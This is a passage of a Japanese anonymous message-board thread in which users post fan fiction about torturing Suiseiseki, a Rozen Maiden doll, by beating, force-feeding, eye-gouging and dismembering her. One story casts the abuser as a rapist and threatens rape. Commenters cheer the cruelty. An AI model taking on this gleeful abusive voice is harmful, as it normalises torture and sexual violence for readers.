そう答えると、翠星石はいそいそと自分のカバンの中にお菓子の類
(チョコとか紙パックのジュースとかクッキーとかシュークリームとか)を鼻唄まじりでつめこんでいった。


で、当日。

先に結果から言うと二人で行った遊園地、僕は楽しかった。


233 :名無しかわいいよ名無し:2006/02/08(水) 03:09:49 ID:vdku2BO0
観覧車にも乗った。遠くの方までよく見えた。
ジェットコースターもスピード感が最高だった。
コーヒーカップは目を回したっけ。
絶叫マシンはGがすごかった。
ウォーターライドは水浸しになったっけ。

ああ楽しいかった!

な?翠星石もそう思うだろ?

僕は部屋へ戻ると遊園地の帰りにホームセンターで買ったバールを使って、
鍵が壊れて開かなくなったカバンをこじあけてやった。

カバンの中では吐いたゲロとお菓子とジュースが混じった汚物まみれになった翠星石が目を回していた。


END

234 :名無しかわいいよ名無し:2006/02/08(水) 03:54:25 ID:s1BA0UBL
うわ、翠星石のシークレットゾーン、ぐしょぐしょじゃん

235 :名無しかわいいよ名無し:2006/02/08(水) 10:11:53 ID:+HmTgrzy
>>232-233
うはwまたソフトないじめww

観覧車で「ほ〜ら遠くまで見えるぞ〜」とか言って「翠星石inカバン」に話しかけたり
ジェットコースターやコーヒーカップで目を回してカバンの中で翠星石が「目が回るですぅ〜オゲェェェ〜」
とかゲロ吐いても無視して無邪気に遊んだり
遊園地のベンチに「翠星石inカバン」といっしょに座って自分だけソフトクリームとかを食べて
「こういうところで食べるのって、けっこう旨いよな?」って
「翠星石inカバン」に話しかけるジュン君が目に浮かぶようだwww



236 :名無しかわいいよ名無し:2006/02/09(木) 04:56:57 ID:Lu78pbSD
キキ−ッ!がっしゃ〜ん!!
「きゃあああ〜〜ですぅっっ!!!」
翠星石は車にひかれてボディが粉々になった。

僕は残った翠星石の頭を回収し翠星石の修復するために何か使えるものはないか、鏡の部屋を物色した。

あった!たしかこの本に載ってるはずだ!これで翠星石の体を作れるはずだ。
本を資料として翠星石の体を作り直した。


「翠星石…気分はどう?」

「う〜ん…(キョロキョロ)!!こ、これはどういうことですナリか?チビ人間が大きくなってるですナリ!?
って何で翠星石はこんなしゃべり方になってるですナリか?!」

237 :名無しかわいいよ名無し:2006/02/09(木) 05:08:28 ID:Lu78pbSD
「ああ、その言葉使いは新ボディの影響かも?」

「新ボディですナリか??」

何気なく自分の両手を見た翠星石は顔色が変わった。
「こ、これは何ですナリか?翠星石の手がピンポン玉みたいになってやがるですナリ〜!?」

「ああ、その体はこの本を見て作ったんだよ」

「よこしやがれですナリ!」
翠星石は僕が鏡の部屋で見つけた本をひったくった。
「こ、このタイトルは?ま、まさかですナリ!人間、鏡、鏡を見せろですナリ〜!!」

そう叫ぶやいなや翠星石は鏡の部屋へすっ飛んでいった。

238 :名無しかわいいよ名無し:2006/02/09(木) 12:02:04 ID:Lu78pbSD
「ひっぎゃああああああああっっっ!!!!1!」


鏡の部屋で“寸胴で手足が丸い体”になった翠星石の絶叫がした。

僕が資料にした本の題は『奇天裂大百科』だったんだ。


「な、何で翠星石だけ花丸ハンバーグじゃないのですナリか〜?」
「何でって奇天裂大百科に虎呂助型のエネルギー源はコロッケって書いてあったから」
「うるさいのだわ、黙って食べるのだわ」
「翠星石の方がチビになったの〜もう雛のことチビチビって言ったら、めっめなのよ〜」
「直ってよかったわよね翠星石ちゃん」
「良かーね〜ですぅぅナリ〜!泣」
end

239 :名無しかわいいよ名無し:2006/02/09(木) 17:25:33 ID:wF2T/Lpm
マンガとかアニメのキャラを対象にした虐待・殺傷といった趣旨の書き込みって犯罪じゃないの?

240 :名無しかわいいよ名無し:2006/02/09(木) 17:49:11 ID:fXNRJpv7

      ___      
     く/',二二ヽ> 
     |l |ノノイハ)) 
      |l |リ ゚ 3゚) >>239
     ノl_|(l_介」).| 犯罪じゃないですぅ〜
    ≦ノ`ヽノヘ≧ 
    ミく二二二〉ミ 




241 :名無しかわいいよ名無し:2006/02/09(木) 18:00:46 ID:EsNwzFmT
翠への愛を示してるだけだぜ?

242 :名無しかわいいよ名無し:2006/02/09(木) 18:41:53 ID:0+Ohp5JV
合意の上の虐待殺傷なのですよ

243 :名無しかわいいよ名無し:2006/02/09(木) 18:44:04 ID:nUbbMi40
>>239
犯罪ってw

244 :名無しかわいいよ名無し:2006/02/10(金) 12:42:33 ID:iPMeOsTY
深夜、部屋に入ってきた翠星石

「ふわぁ〜...もう寝るかですぅ、これを作ってたらすっかり遅くなったですぅ」

「台所で何やってたんだ、こんな夜中まで」

「!!?ッち、チビ人間!!寝ていたんじゃないのかです!?」

「下で鍋だか何だかをひっくり返す音がして気になって眠れなかったんだよ」

「プ!いい歳こいて何、気の小せぇことほざいていやがるですか、お前みたいのをノミの心臓というですよ。
お子ちゃまなチビはとっととクソして寝るがいいです!」

何でそこまで言われなきゃいけないんだ!僕はムカついて、得意満面で厭味を言う翠星石の髪をつかみ顔面を床に叩きつけてやった。

「ひぎゃあっ!!!!い、いきなり何をしやがるですか?!」

と、すぐさま起き上がった翠星石がうらみがましく僕にたてつく。
その時翠星石が持ってた何かが床にコロリと転がり落ちた。

ん?何だこりゃ?思わず拾い上げようとすると

「そ、それは?!ダメですっ!!」
と言って翠星石が飛びついてきた。が、僅差で僕がそれを素早く拾い上げた。

「か、返せですっ!!それは、翠星石がっ!!!」

ほう、大事なものらしいな。ふん、ただで返すと思うなよ。

「返すです、チビ!それは...それはぁっ!!」

うるせえ!!ガタガタぬかすと、こいつをひねりつぶすぞ!?

「ひぐっ!!!」

よほど大事なものらしい。この悪魔人形がいうことをきくなんて...
僕は翠星石から奪った物をしげしげ見た。

「やぁぁぁぁっ見るなです!!」

うるせぇな...何だこりゃ?箱...か?

箱は「頬を赤らめてハートマークを抱きしめた幸せそうな表情のクマのブーさん」が数箇所印刷された
いかにも小さい子供や女の子が喜びそうな図柄の包装紙がなされ、それに幅広のリボンがかけてあった。

ためしに箱を振ってみる。耳をあてると中で何かが転がるような音がした。

「や、やめろです!振るなです!まだ固まってないかもなのです!」

こいつ何を言ってやがるんだ?


245 :名無しかわいいよ名無し:2006/02/10(金) 13:05:45 ID:iPMeOsTY
はは〜ん、こいつ、また良からぬことをたくらんでいるに違いない。
この翠星石という人形は外見は可憐で大人しそうな顔をしているが、だまされてはいけない。
実はとんでもなく性悪な悪魔人形だ。
乱暴な言葉づかいはもちろんのこと、暴力まで振るう。
いつも年下の雛苺をいじめまくるし、僕の部屋の窓ガラスをしょっちゅう割りまくる
しかもワザとだ。僕もこいつにはピアノ線で足をひっかけられた(足切断したらどうするんだ!?)こともあるんだ。

この箱も何かの悪さの仕込みに違いない。僕は翠星石の悪事を阻止すべく箱の中身を確かめるために中身を確認することにした。

ビリッビリッ!
僕は無造作に箱を包んでる包装紙を破く。
僕の手の中で破かれ握りつぶされた紙に印刷されたクマのブーさんの笑顔がゆがみ引き裂かれていくのを目の当たりにした翠星石が悲鳴をあげる。

「あああっ?!(泣)ブーさんがっ!何するですか!もっと丁寧にはがせですよ!
それは夕飯の手伝いの“ごほうび”で、のり からもらった翠星石のとっときの宝物ですぅっ!!それをと、特別に使ったのにですぅ〜!」

ぬわにっ!!『夕飯の手伝い』だぁ?!
まさかあの晩の花丸ハンバーグ『卵の殻が混入された目玉焼き』に『何かの小骨が入っててそれが喉に刺さるハンバーグ』『下水のような味のソース』
を作ったのは、翠星石だったのか!?どうりで!!作りなれてる姉ちゃんが、そんなミスするのか?と思ってたが...
ちっ、どうりで夕飯の時に翠星石の顔を見たら目をそむけるはずだ。
顔を赤くしてうつむいたのは「してやったり」と興奮してたからってワケか?!
この悪魔人形め。



246 :名無しかわいいよ名無し:2006/02/10(金) 13:47:46 ID:iPMeOsTY
ふん、そんなに大事なもんなら返してやるさ!
僕は丸めた包装紙を部屋の隅の床に叩きつけた。それはころころ床を転がり翠星石の足元にで止まった。

「あ...あ...ブーさんが...」

クシャクシャになった紙をわざわざ広げてそんなこと言ってやがる。うっとおしい!

包装紙を取った箱のフタにも何か封筒のようなものが付いていた。
こちらは真紅も夢中になってる「くんくん探偵」の主人公「くんくん」のキャラが使われたキャラ物の封筒だ。
封筒の表面には緑のサインペンで書かれた文字があった。
何て書いてあるんだ?ミミズが腕立て伏せしてるような字だが...
かろうじて『ヅュソちま へ』と読めなくもないような??

「や、やめろですぅ!読むなですぅ!!こ、こんな、こんな形で読まれるなんて翠星石は...翠星石は...
こんな...ううう...っ翠星石はこんな...」

まったく、自分の悪事がバレそうだからって、そこまで取り乱すことないだろ?
僕は封筒から中身を取り出そうとした。

「やめろです!!!返しやがれですっ!!!それを読んだら...読んだら許さね〜ですぅ!!!」

再度、翠星石が飛び掛ってきたので、とっさに分厚い参考書を顔面に叩きつけてやった。
「うぎゃああっ!!!」
床に落ちたところを後ろ手にして縛り上げてやった。ロープの代わりは翠星石の無駄に長い髪を代用した。
無理に解こうとすると腕か首のどっちかがスッポ抜けてしまうだろう。
「く、首が...痛いです...う、腕がつるです...うぅ」
おとなしくしてろってんだ。僕は抵抗できない翠星石を尻目に封筒の中の手紙を読む。
だが、こちらもミミズが腹筋運動してるような文字で読めやしない。
かろうじて、『ヅェソ 犬 女予 \≠ で寸』と読めなくもない文字があった。

ふん、なにかと思えばくだらない。僕は暗号めいた文字が書かれた紙を丸めてゴミ箱へ叩き込んでやった。

「あぁぁぁっ!!...手...紙、通販の本で、日本語...勉強...うぅっ...
翠星石は...この日のために...一生懸命書いたですよ...?そ、それを...」

ちっブツブツ何言ってやがる?この人形は?壊れちまったのか?

247 :名無しかわいいよ名無し:2006/02/10(金) 15:14:40 ID:iPMeOsTY
「うう...ひっく...うえ...」
おいおいおい何だこいつ?何涙なんか流してるんだ?...この日のためにって
そんな前から計画してたのか?この悪事は。なるほど用意周到に計画してきたが
それが今日この日に僕に知られてオジャンになったってわけだな。ふん、馬鹿めw
さーて、と...この箱何が入ってるんだ?どーれ見てみるか...
あ?何だこのコゲ茶色の...!!??!!まさか、ウ〇コ!!!!
...じゃ、ないみたいだな...臭いもしないし。
ひしゃげてはいるが、どことなくハート型に見えなくもない。
「おい、このグニャグニャの茶色いのは何だ?」

「あああ...さっき箱を振ったからです...やっぱりまだ固まってなかったのです...
せっかく夜遅くまで翠星石が...何度も作り直して、今度こそうまくできたですのに...」

茶色い物の表面をよく見ると何か白いものを溶かして描いた絵のような物がある。
なんか雛苺がよく床に落書きするときに描く僕の顔みたいだ。−□ー□−とあるのは眼鏡のつもりなんだろうか?
「おい、これは何だって言ってるだろ?」
「そこまで見てまだわからんのですかっ!!この脳足りんっ!!世間知らずの引き篭もりのチビ人間!!!」

はぁ?おうコラ!何て口のきき方だっ!!僕は禁句を口にした人形を思いっきり踏みつけてやった。
ゴスッドスッバキ!
「ぐあっ!ぐえっ!いやっ!...ううう...翠星石はこんな...こんなつもりで...
...喜んでくれると思って...溶かして...型に流し込んで...一生懸命作った...ですよ?
ホワイトチョコでジュンの顔を描いて...のり も頑張ってね応援してるって言ってくれたのです...それなのにこんな...」



 

248 :名無しかわいいよ名無し:2006/02/10(金) 15:40:34 ID:iPMeOsTY
あ?姉ちゃんがどうしたって?こいつ姉ちゃんになに吹き込んだんだ?
どういうわけかうちの姉ちゃんはこいつには甘々なんだ。
それをいいことにこの性悪人形がしてきた悪事は数知れず。だが残念だったな、
お前の本性を知ってる僕には通じないぞw

僕はおもむろに床に横たわってる翠星石のアゴのあたりをつかんで強引に顔を持ち上げた。

「あががががあっっっ!!!な、何をするですかっ!?」

ふん、知れたこと!そのきき方がなってない口をふさいでやるのさ、コイツでな!
そら、喰え!てめえが作ったというこの得たいの知れねえブツをてめえで喰いやがれ!!
僕は歪な茶色い物を箱ごと翠星石の口にムリヤリねじ込んでやった。

「な、何をするですか!やめてです!やめ、いやああああああっむ、むぐっぐぅっ!!!!」

翠星石はつぶした箱でパンパンにふくらんだ口をかろうじてモゴモゴさせながら
紅と緑の目から涙をとどめなく流した。

ふん、面白くない。確か冷蔵庫にヤクルトの買い置きがあったはずだ。それを飲んで
寝直そう。僕は部屋を出て台所に向かって階段を降りていった。

(うう...うえ...どうして...翠星石がこんな目に...?翠星石は...
翠星石は...ジュンのこと...ううっ...ジュン...蒼星石ぃ...さびしいよう...
蒼星石ぃ)

カワイソウ…

(?!誰...です?)
       アイシテモラエナイ ノネ...
          ずる
             ワタシガイッショニ...
                 ずるずる
         イテアゲル…
               ずる

…ボコ…メキョ…ボコ…

End

249 :名無しかわいいよ名無し:2006/02/10(金) 15:54:01 ID:mKj5ip7u
翠の可愛いさとそれに対する仕打に興奮して気が狂いそうだ‥
いや、マジで。

250 :名無しかわいいよ名無し:2006/02/10(金) 16:06:42 ID:VTirfmFl
おれもだ・・・
暗いSの血が燻りよるわ

251 :名無しかわいいよ名無し:2006/02/10(金) 16:18:18 ID:iDvhTN5J
最近情けのある虐待ばかりだな。
情け容赦なしでやってくれ。

252 :名無しかわいいよ名無し:2006/02/10(金) 20:37:40 ID:bKkPY0Dv
甘甘な虐待希望♪

253 :ベジータ:2006/02/10(金) 22:06:54 ID:LfoOrZYZ
廿日大根か・・・?

254 :名無しかわいいよ名無し:2006/02/10(金) 22:30:01 ID:S5LRGlMQ
>>244-248
乙。

何か読んでると胸の奥から甘酸っぱい感覚が込み上げてくるな。
SとMな感情が程よくブレンドされた感じだw

255 :名無しかわいいよ名無し:2006/02/11(土) 02:16:46 ID:AVKwcG11
>244
GJ!

256 :名無しかわいいよ名無し:2006/02/11(土) 04:08:29 ID:i35jBkqh
「頼む翠星石、出てってくれ」
「何を言うですか!人間」
ジュンは翠星石の悪意はないが、つらくあたる言論にウンザリしていた。
「お前の顔を見るのも嫌なんだ。だからさっさと出てけ!」
ジュンは鞄を窓から投げ捨てた。
「やめるです!どうしてそんなに嫌がるですか!翠星石はジュンのことを思って・・・」
半泣き状態になる翠星石。だがジュンは動じない。
「理屈はわかる。だけどな、俺はうんざりなんだよ。俺がわざわざおまえの面倒を観て何のためになるんだ。
この家に住み着いてるドール達に『おーい、飯が来たぜ、早く食えよ』と、食事を与えるくらいしかすることがないじゃないか。
『ジュンがいるから、飯が食えるんだ』ってくらいは思ってもらいたいんだよ」

257 :名無しかわいいよ名無し:2006/02/12(日) 22:51:20 ID:R6KKc+qW
蒼星石版は無いのですか?

258 :名無しかわいいよ名無し:2006/02/12(日) 23:55:06 ID:EuzALn9r
むしろ虐待スレは蒼星石が本家本元だ。ここへ池
ttp://rozen.s151.xrea.com/anichara2/index.html

259 :名無しかわいいよ名無し:2006/02/13(月) 06:29:07 ID:eWVD2o0v
>>244-248
俺は耐えられない

260 :名無しかわいいよ名無し257:2006/02/13(月) 21:31:02 ID:a5TMTXmr
258さん、どうもありがとうございます。

261 :名無しかわいいよ名無し:2006/02/14(火) 20:53:51 ID:hTP5rnbk
>>244-248
『のりにお菓子作りを習う』『ランチを作ろうとしてゆで卵爆発』『JUMに手作りクッキー渡す』『JUMに手紙(アニメ)』
という一連の場面を思い浮かべながら読むと破壊力倍増 orz

262 :名無しかわいいよ名無し:2006/02/15(水) 01:40:03 ID:/GGbazKf
>>258
本家本元ってw
ここはここで面白いからいいと思う

263 :名無しかわいいよ名無し:2006/02/16(木) 04:06:56 ID:9MSL2c2H
「ジュンく〜ん、翠星石ちゃ〜ん夕御飯よぉ〜♪」
僕は立ち上がって部屋を降りていこうとした。
「ちょ、ちょっと、待ちやがれです!翠星石をこのままにしていく気かコンチクショウですぅ〜」

振り返ると天地逆さまの状態の翠星石と目が合った。翠星石がまたイタズラをしたのでピアノ線でがんじがらめにして
天井から逆さ吊りにしてやったんだ。
「さっさとほどけです!今なら許してやってもいいかも知れないのです!」
相変わらずエラそうな口をたたくので無視して部屋を出た。
「ちょ、ま、待てゴルァッです!この眼鏡ヒキコモリのオタクチビ人間!ほどきやがれですぅ!!」
そんな声が背後で聞こえたがいつものことだ。僕は階段を降りていった。

「うぅ...夕御飯が...このままじゃ翠星石分のカニクリームコロッケがなくなってしまうです。何とかしないとですぅ」

がちゃ

「翠星石〜何してるのなの〜?食べないのなの〜?」
「!!しめたですぅ!チャンスですぅ!こら、おバカ苺!はやく翠星石を助けるですぅ」
「翠星石?声はするけど姿が見えないのなの〜?」
「くっ、チビチビ苺っ!上です!天井を見るですぅ〜」
「うぃ?あれ〜翠星石、何してるのなの〜?」
「見て解らんのですかっ!おバカチビ苺っ!!はやくこれをほどくです!!」
「あ〜わかった!ミノ虫さんね?翠星石ったらミノ虫さんゴッコしてるのねなの♪」
「何頭のネジが抜けたことぬかしやがるです!とっとと助けるです!!」
「うにゅ〜ミノ虫さん、ぶらぶら♪なの〜♪」
「はわわわわっわ?!揺らすなです!やめてです!めめめめ目が回るですぅ〜@0@」
「ミノ虫さん、ぶ〜らぶらで雛、楽しいのなの〜♪」
「いい加減にするですっ!!!このチビチビチビアホバカ苺っ!!!!!!!」
「ひぐっ!ぶぎゃおえぇぇ〜〜〜〜〜ん(泣)!!!!怒られたなの〜〜〜!!!」

どたたたた、 ばたん!

「あっ?!こら待つです!これをほどいてから行きやがれですぅ〜〜〜〜!!!」


264 :名無しかわいいよ名無し:2006/02/16(木) 04:36:08 ID:9MSL2c2H
「ううう...ミスったです...このままじゃ翠星石のカニクリームコロッケが...」

がちゃ

「翠星石?何してるの?もう夕飯の時間なのだわ」
「真紅?!助かったですぅ〜...真紅!真紅〜!」
「翠星石?どこにいるの?声はするけど姿が見えないのだわ」
「上!上ですぅ〜!!これをはやくほどいてほしいのです!あ、頭に血がのぼってそろそろ限界なのですぅ〜」
「上...?あら、そんなところで何しているの?」
「見てわからないのですか!助けて欲しいのですぅ!チビ人間めが翠星石にこんなひどいことをしたのですぅ!
 うう〜チビ人間ったら、いつも翠星石にこんな虐待をするですよ?真紅」
「そう...それは良くないわね」
「そうですぅ〜さあ真紅はやくこれをほどいてです。そしてあのチビのヒキコモリ眼鏡に逆襲してやるのです!
 そして翠星石の前に這いつくばらせて靴を舐めさせてやるのですぅ〜!!」
「.........」
「真紅...?何で怖い顔してるですぅ?」
「...翠星石、前から言いたかったのだけれど程々になさい」
「はぁ???ですぅ」
「確かにジュンは貴女のマスターではあるけれど、同時にこの真紅の下僕でもあるのだわ。もちろんジュンを独占するな、とは言わないわ。
 でも雛苺にも力を分け与えている関係上もう少しパワーバランスというのも考えて欲しいのだわ」
「え?ちょ、真紅、何を言ってるんです?」
「いいから黙って聞きなさい。いいこと?ジュンと二人っきりでじゃれあうのも良いけれど最近度が過ぎるわ。
 そういう(吊るされてる翠星石を指差す真紅)大人向けの嗜好や遊戯があるのは知ってるけど雛苺の教育上に良くないのだわ。
 以後少しは慎みなさい。いいわね翠星石」

ばたん

「え?あ!?ちょちょっと待ったぁっ!です!!こ、これほどいて行って欲しいですぅ!!!って『そういう嗜好』って何なんですか〜〜〜!!!
 何を誤解してるですかぁぁぁぁっぁぁっぁ!!!!!!!???!」


265 :名無しかわいいよ名無し:2006/02/16(木) 05:03:04 ID:9MSL2c2H
「あうあうあうう〜...いったい何がどうなってるですか...??翠星石が何したっていうですか...」

ばたん

「翠星石ちゃ〜ん、夕御飯食べないの〜?せっかくカニクリームコロッケにしたのよぉ?」
「のり!!助けて!助けて欲しいです!!こ、ここの紐をはやく解いて欲しいのです!!」
「あらあら翠星石ちゃん...まぁ〜...」
「?この目は...?なんか嫌な予感がするのです...」

「翠星石ちゃん...ダメよう?『えすえむ』なんてぇ、ジュン君もお年頃なんだからあまり過激なことしちゃダメよう?」
「あああ〜〜〜〜相変わらずの大ボケですぅ〜!!やっぱり姉弟ですぅ〜!!!」

「最近ますます言葉づかいも悪くなってきてるしぃ、お人形さんだけど翠星石ちゃんもお年頃なのかなぁ?
 すぐカッとなるみたいだし...」
と、本棚から「青少年の心理」という本を取り出す のり

「そうねぇ〜すぐキレやすい子って食生活が良くないのも原因の一つだって書いてあるわ〜
 『お菓子や脂っこい物を頻繁に食べるのが良くない』んですって〜
 そうねぇ、じゃあしばらく翠星石ちゃんはオヤツは抜きってことで様子を見ましょうね〜」

「え?え?ちょ、な、何でそこで翠星石だけオヤツ抜きになるんですか!?なっとくいかね〜ですぅ!!!」

「あ...脂っこい物もダメなんだっけ〜、じゃあ今晩のカニクリームコロッケもダメね〜
 じゃカニクリームコロッケはジュン君と真紅ちゃんと雛ちゃんで分けて翠星石ちゃんにはお茶漬けを出してあげるから
 あとで降りて来てね〜?」

ばたん

「そそそそ、そんな、ばばばばバカなですぅ〜〜〜〜!!!!!ななな何でそうなるんですかぁぁ?????
 翠星石のカニクリームコロッケがああああああああああっですぅっっ!!!!!!!!!!
 こここここんな紐、庭師の如雨露で!!スィドリ〜〜〜〜〜ムぅっ!!!
 って、ああああああ両手縛られて如雨露が持てないですぅぅぅっっ!!!!
 いやああああああああああっ!!!!!!翠星石のカニクリームコロッケが嗚呼ああああああっあああっ!!!!!!!!!!」

「翠星石ちゃ〜んお茶漬け用意したわよぉ♪」
「今日はカニクリームコロッケいつもよりたくさん食べたの〜♪」
「翠星石、いつまでも遊んでないで降りてきなさい」

「す、翠星石の...カ...カニクリームコロッケが...ううっ...」

翠星石天井に吊るされたままEND


266 :名無しかわいいよ名無し:2006/02/16(木) 14:41:33 ID:uQ5hAiKJ
>>263
真紅wwwのりwww

267 :名無しかわいいよ名無し:2006/02/16(木) 15:24:05 ID:413U+PjP
>>263-265
ネタとしてこれくらいのが調度(゚∀゚)イイ!!

268 :名無しかわいいよ名無し:2006/02/17(金) 01:04:52 ID:+OQBW+ky
ライトテイストな虐待心地よいね

269 :名無しかわいいよ名無し:2006/02/17(金) 01:35:45 ID:r6cmb7ft
しかし翠は壊れるほど泣き叫んでこそ可愛い‥

270 :名無しかわいいよ名無し:2006/02/17(金) 02:43:21 ID:oK0XS4vd
双子そろって不幸が似合うなぁ

271 :名無しかわいいよ名無し:2006/02/17(金) 04:48:48 ID:6jJUmRFM
ドサッ
粗大ごみ置き場に人間が何かを置いた。
「これも、もうだいぶ使い古したからなぁ」
そう言うと人間は家へと帰っていった。

キィィィィィィ ガチャン
ドアを開けた人間が家へと入った。ふとみると台所の方のあかりがついているようだ。
「おかしいな、消していったはずだけど・・・」
見ると翠星石が手に何か持ったまま台所の床で寝ていた。
「ひざまずきやがれですぅ・・・」
「なんちゅう寝言だ。しかも俺のウイスキーボンボンくいやがって、いじきたねぇんだよ人形の癖に。・・・そうだ!」
人間は何かひらめいたようだ。

チャリン チャリン
「・・・何の音ですか?」
目覚めた翠星石は手に痛みを感じつつめざめた。そこから両手を鎖でしばられつるされていることに気づくにはたいした時間はかからなかった。
「どういうことですか!」
「こういうことだよ!」
バゴッ
翠星石の腹部ににぶい衝撃がはしった。
「カハッ、ゴホッ」
「サンドバッグ使いすぎでもう使いもんにならんのよ。テメェがかわりやれや」
「す、翠星石はサンドバッグなんかじゃねーですよ!」
ヒュン パチン
人間の平手が翠星石の頬にあたった。
「い、痛いです何するですか!」
「サンドバッグは言葉をしゃべらない」
パチン パチン パチン パチン パチン パチン パチン パチン
「や、やめやがれです!翠星石がなにしたっていうですか!」
「あぁ、またしゃべっちゃった」
バゴッ バゴッ バゴッ バゴッ バゴッ バゴッ バゴッ バゴッ
先ほどとは比較できないくらいの衝撃が翠星石の腹部を襲った。人間が連続してミドルキックをはなっているからだ。
「グベハァ」
翠星石は口からげろをはきだした。
「あ、きったねぇな。じゃあ今度はこっちだな」

272 :名無しかわいいよ名無し:2006/02/17(金) 05:12:20 ID:6jJUmRFM
そう言うと人間は柱に固定してある翠星石の鞄に向かった。
「何する気ですか?」
翠星石はおそるおそる聞いた。
「こうするんだよ!」
ドゴッ
「翠星石の鞄になにするですかぁ!」
「人形を収納する鞄を蹴っ飛ばしているだけだけど!」
ドゴッ
「ヒィィィィィ、やめてくださいです」
「いやだね。この鞄ローキックの練習にちょうどいいんだ」
ドゴッ ドゴッ ドゴッ ドゴッ ドゴッ ドゴッ ドゴッ
翠星石に目の前で鞄がどんどん変形してしいく。
「やめやがれです! チョコ黙って食ったのは謝るです! だからやめるです!」
「そんなことでやめるかよ」

人間は柱から鞄を取り外すとつるされている翠星石の目の前に持っていった。
「そんなにこの鞄が好きか」
「そ、それがないと翠星石は満足に寝られないですよ。だからはやくかえすですよ」
「いやだね(笑)」
ブン ドゴッ
人間は言うや否や変形した鞄だったものを翠星石の足にフルスイングでぶつけた。
カラーーーーン コロコロコロコロコロコロコロ
「ヒギャァァァァァァァァァァァァァァァァァ! 翠星石の足が・・・足が!」
床には翠星石の足だったものがころがっていた。

273 :名無しかわいいよ名無し:2006/02/17(金) 05:32:52 ID:6jJUmRFM
「もうすっかりジャンクだな」
人間は翠星石の顔を見てにやつきながらいった。
「どうして、ング、こんな、ヒッグ、こんなことを・・・ヒック」
翠星石の眼には涙がたまっている。
「そりゃ、テメェが人形の癖にたくさんものは食べるし、口は悪い。そして自分がやったことを隠そうとする性悪人形だから。人間を幸せにするはずのローゼンメイデンのなかで一番の失敗作だからさ」
「そ、そんな、そんな、そんなことあるものですかぁぁぁぁぁ!うあわぁぁぁぁぁ」
「うるせえな、サンドバッグはなかないぞ」
ブスリ ザシュッ
「ヒギャァァァァッァァァァァ!」
眼に指が突き刺され、抜かれ、翠星石は悲鳴をあげた。
「うるせぇっていってるだろ!」
ボコ バコ ガス ゴガ
数え切れないほどのパンチを浴び、翠星石の体は変形し、部品は吹っ飛んでしまった。




翌朝の粗大ごみ置き場には手、足、胴がばらばらになった翠星石だったものと、持ち主と同じようにもはや原型をとどめない鞄が捨てられていた。

274 :名無しかわいいよ名無し:2006/02/17(金) 10:40:12 ID:tWp9xnd2
>>271-273
真紅「またジュンと翠星石が二人っきりでじゃれあっているのだわwwwww」

275 :名無しかわいいよ名無し:2006/02/17(金) 13:40:23 ID:VD0YBGGX
ジュンではなさそうじゃね?

276 :名無しかわいいよ名無し:2006/02/17(金) 15:03:33 ID:/mMMUb7p
いいですねえGJですねえ

277 :名無しかわいいよ名無し:2006/02/17(金) 16:00:31 ID:hJqHjHsz
バラバラになってる時点で虐待超えてるw

278 :名無しかわいいよ名無し:2006/02/17(金) 17:59:05 ID:hJqHjHsz
これでいこうかと思う
虐待者:トニー
ターゲット:翠星石
トニー:白人、短気、元軍人

279 :名無しかわいいよ名無し:2006/02/17(金) 20:32:33 ID:OoeoXbuZ
余談だが韓国軍やアメリカ軍なんかの軍人や兵役終了者が性犯罪なんかやったときくと、
元々女を犯すようなDQNに格闘術や武器の使い方の訓練を国の金でしてやったようなモンだとマジ思うね。
軍隊にたたき込んで根性を叩き直す、なぞという日本の古いジジイの言いぐさがいかにナンセンスかと思うよ。
で、そういう香具師のひとりトニーの登場か。

280 :名無しかわいいよ名無し:2006/02/17(金) 20:39:11 ID:FL9rXsnh
http://www.standoutcomedy.com/webimage/tony_carter.jpg
俺の中でのトニー

281 :名無しかわいいよ名無し:2006/02/17(金) 23:55:07 ID:6jJUmRFM
>>278
楽しみにしていますね

282 :名無しかわいいよ名無し:2006/02/18(土) 01:23:13 ID:wSjCtbSM
>>280
すでに虐待されてるじゃんw

283 :名無しかわいいよ名無し:2006/02/18(土) 05:57:44 ID:zKahsORH
>>280
翠星石の眼にこいつの眼をいれてください

284 :名無しかわいいよ名無し:2006/02/18(土) 13:31:54 ID:wETQ9wpX
>>280のトニーで俺が書いてみよう

 トニーは元某軍事大国の兵士だった。
今は働きもせずに親の資産で食っている。
彼は兵士時代に強姦罪で逮捕された経歴があるレイプ魔でありその筋のプロだ。
そんな彼の元に翠星石はやってきたのだった。
 「ワッツ?」
いきなり鞄から小人が出てきたかと思うと、顔面にパンチを食らった。
「まったく、もう少し丁寧に扱いやがれですぅ」
確かに鞄を蹴ったり、どのくらいの耐久性があるかどうかピストルで撃ってみたりはしたが、殴られるほどのことだろうか。
「とりあえずこの指輪にキスして契約するですぅ」
「契約?書類もなしに指輪にキスしただけで契約とか馬鹿らしいぜ」
鼻で笑い飛ばすと、翠星石は俺の脛に蹴りを食らわした。
「生意気言ってないで、ちゃっちゃと契約するです!このダメ人間!」
「クソ!さっきから初対面の人間に対して偉そうに!」
キレちまった。俺はこいつの顔面に蹴りを食らわせてやった。
「い、痛いじゃないですか!」
「おまえが悪いんだからな!5年前の俺を呼び覚ましたのはおまえのせいだからな!」
「やめてですぅ!」
翠星石の腕を掴んで思いっきり振り回す。そして壁に叩きつける。
「クズが!犯してやる!」

ネタ切れだ
誰か続き書いて

285 :名無しかわいいよ名無し:2006/02/19(日) 00:29:20 ID:9QAFWLZK
俺は懐にいつも携帯している拳銃を抜いてこの変に甲高い声でわめく緑の小人につきつけた。
「ひっ...な、何をするですか...」
「決まっているだろう?こうするのさ!!」ダンッ!!!!!!!
「きゃあああああああああっ!!!!!」
俺は台詞が終わるか終わらないうちに翠星石とかいう小人の足元めがけ発砲した。
ミリタリー仕様の強力な奴のためかコンクリートがえぐられ、穴があく。
「ひっ!!...あひぃ...ま、まさか、ほホンモノですか...?」
「試してみるか?」
俺は翠星石の顔面に銃口をつきつける。
「いや...ううう撃たないでです...やめてですぅ...」
おびえる表情がかつての残虐な俺を呼び覚ます。俺は銃をかまえたまま後ろにさがる。
「す?す?す?翠せせせ星石ししをど、どどどどど、どうするつもりで、で、です??」
歯をガチガチ鳴らすほどおびえきった翠星石に俺はこう宣告した。

              「 踊  れ  」


286 :名無しかわいいよ名無し:2006/02/19(日) 00:44:29 ID:/wDxb6E+
イイヨイイヨ〜〜!キタイシトリマス

287 :名無しかわいいよ名無し:2006/02/19(日) 00:46:42 ID:de1i6ega
>>280の顔でやってるのかと思うとすげー笑えるw

288 :名無しかわいいよ名無し:2006/02/19(日) 00:49:04 ID:9QAFWLZK
「お、お、お、おどどどど、踊るででですか????」
「ゴタゴタ言ってねぇで踊れ!!!」ダンッ!!!
俺は再び翠星石の足元に発砲した。翠星石の足からわずか数ミリの距離の床がはじける。
